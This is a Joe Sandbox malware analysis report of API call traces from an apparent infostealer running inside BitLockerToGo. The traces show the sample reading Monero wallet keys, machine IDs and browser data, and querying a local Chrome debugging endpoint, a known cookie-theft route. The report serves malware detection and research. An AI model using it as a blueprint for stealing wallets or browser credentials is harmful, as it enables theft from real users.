                                                                                                                                                                                                                                                                                                                    • Opcode ID: 08b5f5bad9015897fd0121711224b9ca8dfd37d5b06f650144e41426260c5a0b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 33fd7d3380eb53e115463a8501598a4969be3efad0e6989f36a76e4bc1eeb5c1
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 08b5f5bad9015897fd0121711224b9ca8dfd37d5b06f650144e41426260c5a0b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D4191B1F0426C66CF20DBB58C09BEB7BADEF55354F500992A5C9E3181DB749AC48B90
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00917816,00000000,?,?), ref: 008F2ECF
                                                                                                                                                                                                                                                                                                                    • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 008F2F0C
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F2F39
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 008F2F58
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 008F2F8E
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F2FA3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00917E28), ref: 008F3038
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 008F30A2
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 008F30C2
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 008F30CE
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                                                                    • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c516e29983ae48a88d206803b4e04c6628e5c2604084274c538d4a5247bf6ad3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6d347a287c43e7c34359e8777542a07fab4d39920256db95243342b759455d07
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c516e29983ae48a88d206803b4e04c6628e5c2604084274c538d4a5247bf6ad3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A761B77590012CAAEB21DB65DD84EDABBB8FB45304F1046E6A608E3121DF706FC6CF54
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 008E7E3C
                                                                                                                                                                                                                                                                                                                    • InternetOpenUrlA.WININET(00000000,http://localhost:9223/json,00000000,00000000,80000000,00000000), ref: 008E7E6F
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 008E7E7C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internet$Open$CloseHandle
                                                                                                                                                                                                                                                                                                                    • String ID: "webSocketDebuggerUrl":$"ws://$WebSocketClient$http://localhost:9223/json
                                                                                                                                                                                                                                                                                                                    • API String ID: 3289985339-1054772028
                                                                                                                                                                                                                                                                                                                    • Opcode ID: c4c72afe30b3801783e9e4654a16d05b926f05d72bebe499e17f16c5c9c826a2
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8a0690768f7bfe2424b0441af69bf8b53db53877de4d664ce9fa8089a943a5a3
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c4c72afe30b3801783e9e4654a16d05b926f05d72bebe499e17f16c5c9c826a2
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9414F71E042ACAFDB219B659C89EEA72BCFB49755F0000E5F748E3141DAB05EC58F61
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 008F2631
                                                                                                                                                                                                                                                                                                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008F2671
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 008F26C6
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008F26CD
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008F2703
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00917DD8), ref: 008F2712
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 008F32FB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: _memset.LIBCMT ref: 008F332A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: lstrcat.KERNEL32(?,00000000), ref: 008F3352
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F32E0: lstrcat.KERNEL32(?,00917E68), ref: 008F336F
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F2729
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F421B: malloc.MSVCRT ref: 008F4220
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F421B: strncpy.MSVCRT ref: 008F4231
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 008F274C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$Heap$AllocateCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: :\$C$QuBi
                                                                                                                                                                                                                                                                                                                    • API String ID: 3915896539-239756005
                                                                                                                                                                                                                                                                                                                    • Opcode ID: d2e5848c1fa0caca621f088786d3bfb82ffae34da2c8d80bee3dbce82b5b1dad
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 03627294fd5dcda3e764ce5454acf8bd05a0e9ef53ca3747a06618447f7ad318
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d2e5848c1fa0caca621f088786d3bfb82ffae34da2c8d80bee3dbce82b5b1dad
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1416D7194412CABCB25AF789D45AEEBABCFF19300F0000E5F649E3121DA748F918FA5
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008E13A9), ref: 008F28BB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: RtlAllocateHeap.NTDLL(00000000), ref: 008F28C2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F28AF: GetUserNameA.ADVAPI32(00000000,008E13A9), ref: 008F28D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,008F9D6E), ref: 008F9007
                                                                                                                                                                                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,?,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F9013
                                                                                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,008F9D6E), ref: 008F9024
                                                                                                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,00917803), ref: 008F9249
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008F9307
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008F931A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 008F2631
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 008F2671
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 008F26C6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F25FE: RtlAllocateHeap.NTDLL(00000000), ref: 008F26CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E4A56: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E4AF5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E4A56: StrCmpCA.SHLWAPI(?), ref: 008E4B13
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F56FF: StrCmpCA.SHLWAPI(?,block,?,?,008F9377), ref: 008F5714
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F56FF: ExitProcess.KERNEL32 ref: 008F571F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E5F00
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: StrCmpCA.SHLWAPI(?), ref: 008E5F1E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F4DE6: strtok_s.MSVCRT ref: 008F4E05
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F4DE6: strtok_s.MSVCRT ref: 008F4E88
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 008F96C8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E60B6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 008E60FA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E5E61: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E612C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F4387: SHFileOperation.SHELL32(?), ref: 008F43BD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?,?,?,?), ref: 008F8DB4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: wsprintfA.USER32 ref: 008F8DD5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: FindFirstFileA.KERNEL32(?,?), ref: 008F8DEC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: _mbscmp.MSVCRT ref: 008F8E13
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: _mbscmp.MSVCRT ref: 008F8E2B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: _splitpath.MSVCRT ref: 008F8E66
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8D90: _ismbcupper.MSVCRT ref: 008F8EB3
                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 008F97C6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: _memset.LIBCMT ref: 008F9A71
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: _memset.LIBCMT ref: 008F9A80
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 008F9A95
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: ShellExecuteEx.SHELL32(?), ref: 008F9C35
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: _memset.LIBCMT ref: 008F9C44
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F9A4C: _memset.LIBCMT ref: 008F9C56
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: InternetOpen$Heap_memsetlstrcpy$FileProcess$AllocateCloseCreateDirectoryEventHandleName_mbscmpstrtok_s$ConnectExecuteExitFindFirstFolderHttpInformationModuleOperationOptionPathRequestShellSleepUserVolumeWindows_ismbcupper_splitpathlstrcatlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: 635b5ceb8ed09951eb8d5e776815ad72$abc_
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E68F1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: StrCmpCA.SHLWAPI(?), ref: 008E690B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E693A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 008E6979
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E69A9
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E69B4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E688F: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E69D8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,ERROR), ref: 008F8669
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F8674
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A7B: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,008F8680,?), ref: 008F3A93
                                                                                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,?), ref: 008F8689
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008F8698
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000), ref: 008F86B1
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFB02
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFB79
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC,firefox), ref: 008EFE8D
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFC6F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFD20
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(8D5052FC), ref: 008EFD97
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                                    • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E1ACC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 008E1A55
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: RtlAllocateHeap.NTDLL(00000000), ref: 008E1A5C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,008E1AD9), ref: 008E1A79
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: RegQueryValueExA.ADVAPI32(008E1AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1A94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E1A41: RegCloseKey.ADVAPI32(008E1AD9), ref: 008E1A9D
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 008E1AE1
                                                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 008E1AEE
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,.keys), ref: 008E1B09
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008E1C1A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008E1C8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Filelstrcpy$lstrcat$CloseCreateHeaplstrlen$AllocAllocateCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                                                                                                                                                                    • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 008F18A0
                                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 008F18CC
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F1911
                                                                                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,00000000,?,00000208,00000000), ref: 008F1976
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F1A02
                                                                                                                                                                                                                                                                                                                    • ??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 008F1A63
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F045E: _memmove.LIBCMT ref: 008F0478
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Process_memset$MemoryOpenRead_memmove
                                                                                                                                                                                                                                                                                                                    • String ID: N0ZWFt
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008F3263
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 008F3282
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 008F32A7
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?), ref: 008F32B3
                                                                                                                                                                                                                                                                                                                    • CharToOemA.USER32(?,?), ref: 008F32C7
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CharCloseOpenQueryValue_memset
                                                                                                                                                                                                                                                                                                                    • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                                                    • API String ID: 2235053359-1211650757
                                                                                                                                                                                                                                                                                                                    • Opcode ID: b369e1dfcf268da73fa8fdd46c3138d3a9148fcb8769825538ddd1e2be7d9344
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 93ad49cac9acbcbe43f756ff4da6c81b226d231cb9a95dc30e288d938c4d7dd2
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b369e1dfcf268da73fa8fdd46c3138d3a9148fcb8769825538ddd1e2be7d9344
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94111EB590421DAFDB20DBA0DC89EEBB7BCEB14304F4041E5A659E2062DA709E898F50
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 008E1A55
                                                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E1A5C
                                                                                                                                                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,008E1AD9), ref: 008E1A79
                                                                                                                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(008E1AD9,wallet_path,00000000,00000000,00000000,000000FF), ref: 008E1A94
                                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(008E1AD9), ref: 008E1A9D
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • SOFTWARE\monero-project\monero-core, xrefs: 008E1A6F
                                                                                                                                                                                                                                                                                                                    • wallet_path, xrefs: 008E1A8C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                                                                                                                                                                                                                                                                                    • String ID: SOFTWARE\monero-project\monero-core$wallet_path
